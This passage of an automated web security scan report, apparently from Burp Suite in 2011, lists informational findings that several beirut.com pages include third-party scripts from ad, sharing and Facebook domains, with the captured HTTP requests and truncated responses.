                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.605. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Foreign-Exchange/5783938930

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Foreign-Exchange/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:21:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.606. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Games-Entertainment/078114628

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Games-Entertainment/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:22:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.607. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Health-and-Wellbeing/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:27:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.608. http://www.beirut.com/Online-Internet/Music/4018807677

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Music/4018807677

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Music/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:29:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.609. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Nights-Food-and-Drink/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:29:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.610. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Personal-and-Opinion/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:29:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.611. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Photography-and-Arts/3885810201

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Photography-and-Arts/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:31:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.612. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Politics-Media-and-News/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:35:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.613. http://www.beirut.com/Online-Internet/Real-Estate/5645685094

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Real-Estate/5645685094

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Real-Estate/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:36:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.614. http://www.beirut.com/Online-Internet/Recreation/182769021

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Recreation/182769021

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Recreation/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:37:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.615. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Social-and-Activist/3727967600

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Social-and-Activist/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:37:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.616. http://www.beirut.com/Online-Internet/Technology/8023704728

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Technology/8023704728

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Technology/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:39:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.617. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
